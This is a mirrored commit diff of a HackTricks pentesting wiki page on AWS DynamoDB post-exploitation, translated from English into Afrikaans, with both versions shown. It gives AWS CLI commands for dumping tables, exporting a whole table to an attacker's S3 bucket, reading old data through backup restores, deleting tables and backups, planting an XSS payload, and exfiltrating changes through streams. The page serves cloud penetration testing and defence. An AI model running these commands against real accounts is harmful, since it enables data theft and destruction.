gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-14 22:03:11 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Browse Source
This commit is contained in:
Translator
2024-12-31 20:29:08 +00:00
parent 2753c75e8b
commit 396dbafaf2
245 changed files with 9878 additions and 12609 deletions
Download Patch File Download Diff File Expand all files Collapse all files

292
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## DynamoDB
For more information check:
Vir meer inligting, kyk:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
@@ -12,342 +12,292 @@ For more information check:
### `dynamodb:BatchGetItem`
An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
'n Aanvaller met hierdie toestemmings sal in staat wees om **items uit tabelle te kry deur die primêre sleutel** (jy kan nie net vir al die data van die tabel vra nie). Dit beteken dat jy die primêre sleutels moet ken (jy kan dit kry deur die tabel metadata te verkry (`describe-table`).
{{#tabs }}
{{#tab name="json file" }}
```bash
aws dynamodb batch-get-item --request-items file:///tmp/a.json
// With a.json
{
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
}
}
]
}
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
}
}
]
}
}
```
{{#endtab }}
{{#tab name="inline" }}
```bash
aws dynamodb batch-get-item \
--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
--region <region>
--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
### `dynamodb:GetItem`
**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
**Soortgelyk aan die vorige toestemmings** laat hierdie een 'n potensiële aanvaller toe om waardes van net 1 tabel te lees gegewe die primêre sleutel van die inskrywing om te verkry:
```json
aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json
// With a.json
{
"Id" : {
"N": "205"
"N": "205"
}
}
```
With this permission it's also possible to use the **`transact-get-items`** method like:
Met hierdie toestemming is dit ook moontlik om die **`transact-get-items`** metode te gebruik soos:
```json
aws dynamodb transact-get-items \
--transact-items file:///tmp/a.json
--transact-items file:///tmp/a.json
// With a.json
[
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
]
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
### `dynamodb:Query`
**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
**Soos die vorige toestemmings** laat hierdie een 'n potensiële aanvaller toe om waardes van net 1 tabel te lees gegewe die primêre sleutel van die inskrywing om te verkry. Dit laat toe om 'n [substel van vergelykings](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) te gebruik, maar die enigste vergelyking wat toegelaat word met die primêre sleutel (wat moet verskyn) is "EQ", so jy kan nie 'n vergelyking gebruik om die hele DB in 'n versoek te verkry nie.
{{#tabs }}
{{#tab name="json file" }}
```bash
aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
// With a.json
{
// With a.json
{
"Id" : {
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
}
```
{{#endtab }}
{{#tab name="inline" }}
```bash
aws dynamodb query \
--table-name TargetTable \
--key-condition-expression "AttributeName = :value" \
--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
--region <region>
--table-name TargetTable \
--key-condition-expression "AttributeName = :value" \
--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
### `dynamodb:Scan`
You can use this permission to **dump the entire table easily**.
Jy kan hierdie toestemming gebruik om **die hele tabel maklik te dump**.
```bash
aws dynamodb scan --table-name <t_name> #Get data inside the table
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
### `dynamodb:PartiQLSelect`
You can use this permission to **dump the entire table easily**.
Jy kan hierdie toestemming gebruik om **die hele tabel maklik te dump**.
```bash
aws dynamodb execute-statement \
--statement "SELECT * FROM ProductCatalog"
--statement "SELECT * FROM ProductCatalog"
```
This permission also allow to perform `batch-execute-statement` like:
Hierdie toestemming laat ook toe om `batch-execute-statement` uit te voer soos:
```bash
aws dynamodb batch-execute-statement \
--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
```
maar jy moet die primêre sleutel met 'n waarde spesifiseer, so dit is nie so nuttig nie.
but you need to specify the primary key with a value, so it isn't that useful.
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
Hierdie toestemming sal 'n aanvaller toelaat om die **hele tabel na 'n S3-bucket** van sy keuse te **eksporteer:**
```bash
aws dynamodb export-table-to-point-in-time \
--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
--s3-bucket <attacker_s3_bucket> \
--s3-prefix <optional_prefix> \
--export-time <point_in_time> \
--region <region>
--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
--s3-bucket <attacker_s3_bucket> \
--s3-prefix <optional_prefix> \
--export-time <point_in_time> \
--region <region>
```
Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
Let wel, vir dit om te werk moet die tabel punt-in-tyd-herstel geaktiveer wees, jy kan nagaan of die tabel dit het met:
```bash
aws dynamodb describe-continuous-backups \
--table-name <tablename>
--table-name <tablename>
```
If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
As dit nie geaktiveer is nie, sal jy dit moet **aktiveer** en daarvoor het jy die **`dynamodb:ExportTableToPointInTime`** toestemming nodig:
```bash
aws dynamodb update-continuous-backups \
--table-name <value> \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
--table-name <value> \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
Met hierdie toestemmings sou 'n aanvaller in staat wees om **nuwe tabel uit 'n rugsteun te skep** (of selfs 'n rugsteun te skep om dit dan in 'n ander tabel te herstel). Dan, met die nodige toestemmings, sou hy in staat wees om **inligting** van die rugsteun te kontroleer wat **nie meer in die produksie** tabel kon wees nie.
```bash
aws dynamodb restore-table-from-backup \
--backup-arn <source-backup-arn> \
--target-table-name <new-table-name> \
--region <region>
--backup-arn <source-backup-arn> \
--target-table-name <new-table-name> \
--region <region>
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table backup
**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel rugsteun te lokaliseer
### `dynamodb:PutItem`
This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
Hierdie toestemming laat gebruikers toe om 'n **nuwe item aan die tabel toe te voeg of 'n bestaande item met 'n nuwe item te vervang**. As 'n item met dieselfde primêre sleutel reeds bestaan, sal die **hele item vervang word** met die nuwe item. As die primêre sleutel nie bestaan nie, sal 'n nuwe item met die gespesifiseerde primêre sleutel **gecreëer** word.
{{#tabs }}
{{#tab name="XSS Example" }}
{{#tab name="XSS Voorbeeld" }}
```bash
## Create new item with XSS payload
aws dynamodb put-item --table <table_name> --item file://add.json
### With add.json:
{
"Id": {
"S": "1000"
},
"Name": {
"S": "Marc"
},
"Description": {
"S": "<script>alert(1)</script>"
}
"Id": {
"S": "1000"
},
"Name": {
"S": "Marc"
},
"Description": {
"S": "<script>alert(1)</script>"
}
}
```
{{#endtab }}
{{#tab name="AI Example" }}
{{#tab name="AI Voorbeeld" }}
```bash
aws dynamodb put-item \
--table-name ExampleTable \
--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
--region <region>
--table-name ExampleTable \
--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
**Potensiële Impak:** Exploitatie van verdere kwesbaarhede/omseilings deur in staat te wees om data in 'n DynamoDB-tabel toe te voeg/wysig
### `dynamodb:UpdateItem`
This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.
Hierdie toestemming laat gebruikers toe om **die bestaande eienskappe van 'n item te wysig of nuwe eienskappe aan 'n item toe te voeg**. Dit **vervang nie** die hele item nie; dit werk slegs die gespesifiseerde eienskappe by. As die primêre sleutel nie in die tabel bestaan nie, sal die operasie **'n nuwe item skep** met die gespesifiseerde primêre sleutel en die eienskappe wat in die opdateringuitdrukking gespesifiseer is, stel.
{{#tabs }}
{{#tab name="XSS Example" }}
```bash
## Update item with XSS payload
aws dynamodb update-item --table <table_name> \
--key file://key.json --update-expression "SET Description = :value" \
--expression-attribute-values file://val.json
--key file://key.json --update-expression "SET Description = :value" \
--expression-attribute-values file://val.json
### With key.json:
{
"Id": {
"S": "1000"
}
"Id": {
"S": "1000"
}
}
### and val.json
{
":value": {
"S": "<script>alert(1)</script>"
}
":value": {
"S": "<script>alert(1)</script>"
}
}
```
{{#endtab }}
{{#tab name="AI Example" }}
{{#tab name="AI Voorbeeld" }}
```bash
aws dynamodb update-item \
--table-name ExampleTable \
--key '{"Id": {"S": "1"}}' \
--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
--region <region>
--table-name ExampleTable \
--key '{"Id": {"S": "1"}}' \
--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
**Potensiële Impak:** Exploitatie van verdere kwesbaarhede/omseilings deur in staat te wees om data in 'n DynamoDB-tabel by te voeg/wysig
### `dynamodb:DeleteTable`
An attacker with this permission can **delete a DynamoDB table, causing data loss**.
'n Aanvaller met hierdie toestemming kan **'n DynamoDB-tabel verwyder, wat dataverlies veroorsaak**.
```bash
aws dynamodb delete-table \
--table-name TargetTable \
--region <region>
--table-name TargetTable \
--region <region>
```
**Potential impact**: Data loss and disruption of services relying on the deleted table.
**Potensiële impak**: Gegevensverlies en onderbreking van dienste wat op die verwyderde tabel staatmaak.
### `dynamodb:DeleteBackup`
An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.
'n Aanvaller met hierdie toestemming kan **'n DynamoDB-rugsteun verwyder, wat moontlik tot gegevensverlies kan lei in die geval van 'n rampherstel-scenario**.
```bash
aws dynamodb delete-backup \
--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
--region <region>
--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
--region <region>
```
**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario.
**Potensiële impak**: Gegevensverlies en onvermoë om van 'n rugsteun te herstel tydens 'n rampherstel-scenario.
### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`
> [!NOTE]
> TODO: Test if this actually works
> TODO: Toets of dit werklik werk
An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.
1. Enable a stream on a DynamoDB table:
'n Aanvaller met hierdie toestemmings kan **'n stroom op 'n DynamoDB-tabel aktiveer, die tabel opdateer om veranderinge te begin stroom, en dan toegang tot die stroom verkry om veranderinge aan die tabel in werklike tyd te monitor**. Dit stel die aanvaller in staat om data veranderinge te monitor en te exfiltreer, wat moontlik kan lei tot data lek.
1. Aktiveer 'n stroom op 'n DynamoDB-tabel:
```bash
bashCopy codeaws dynamodb update-table \
--table-name TargetTable \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region <region>
--table-name TargetTable \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region <region>
```
2. Describe the stream to obtain the ARN and other details:
2. Beskryf die stroom om die ARN en ander besonderhede te verkry:
```bash
bashCopy codeaws dynamodb describe-stream \
--table-name TargetTable \
--region <region>
--table-name TargetTable \
--region <region>
```
3. Get the shard iterator using the stream ARN:
3. Kry die shard iterator met behulp van die stroom ARN:
```bash
bashCopy codeaws dynamodbstreams get-shard-iterator \
--stream-arn <stream_arn> \
--shard-id <shard_id> \
--shard-iterator-type LATEST \
--region <region>
--stream-arn <stream_arn> \
--shard-id <shard_id> \
--shard-iterator-type LATEST \
--region <region>
```
4. Use the shard iterator to access and exfiltrate data from the stream:
4. Gebruik die shard iterator om toegang te verkry tot en data uit die stroom te exfiltreer:
```bash
bashCopy codeaws dynamodbstreams get-records \
--shard-iterator <shard_iterator> \
--region <region>
--shard-iterator <shard_iterator> \
--region <region>
```
**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes.
**Potensiële impak**: Regte-tyd monitering en data lekkasie van die DynamoDB tabel se veranderinge.
{{#include ../../../banners/hacktricks-training.md}}